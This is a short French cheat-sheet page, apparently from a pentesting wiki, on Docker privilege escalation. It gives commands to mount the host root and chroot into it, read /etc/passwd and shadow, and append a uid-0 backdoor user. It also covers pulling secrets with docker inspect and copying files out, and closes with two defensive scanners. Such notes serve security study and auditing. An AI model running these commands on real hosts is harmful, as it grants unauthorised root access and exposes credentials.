⛴️Docker

Privesc

Privesc rapide

docker run -it -v /:/host/ ubuntu:latest chroot /host/ bash

Privesc par création d'un nouveau utilisateur

Un attaquant peut tenter une élévation de privilèges en montant le fichier etc à la recherche des fichier passwd, shadow ou ssh-key.

docker run -v /etc/:/mnt -it <debian>
cd /mnt
cat passwd

Si on a accès au fichier shadow, on peut tenter de cracker les hash de mot de passe et si on a directement accès au fichier passwd alors on peut tout simplement ajouter son propre utilisateur a privilèges.

Pour ceci on va d'abord créer l'utilisateur comme ceci:

openssl passwd -1 -salt <username>
Password:
$1$<username>$...

Puis on va l'ajouter au fichier passwd comme ceci:

docker run -v /etc/:/mnt/ -it <debian>
cd /mnt
echo '<username>:<saltpasswd>:0:0::/root:/bin/bash' >> passwd
tall passwd
su <username>
id

Recherche de secrets

docker inspect <docker_id>

Extraire un fichier

docker cp <docket_id>:/etc/<file> <file>

Outils

Grype

Grype est Un scanner de vulnérabilité pour les images de conteneurs et les systèmes de fichiers.

ressource: https://github.com/anchore/grype

Docker Bench Security

Docker bench security est un script bash permettant d'automatiser les contrôles du CIS benchmark docker.

ressource: https://github.com/docker/docker-bench-security

Dernière mise à jour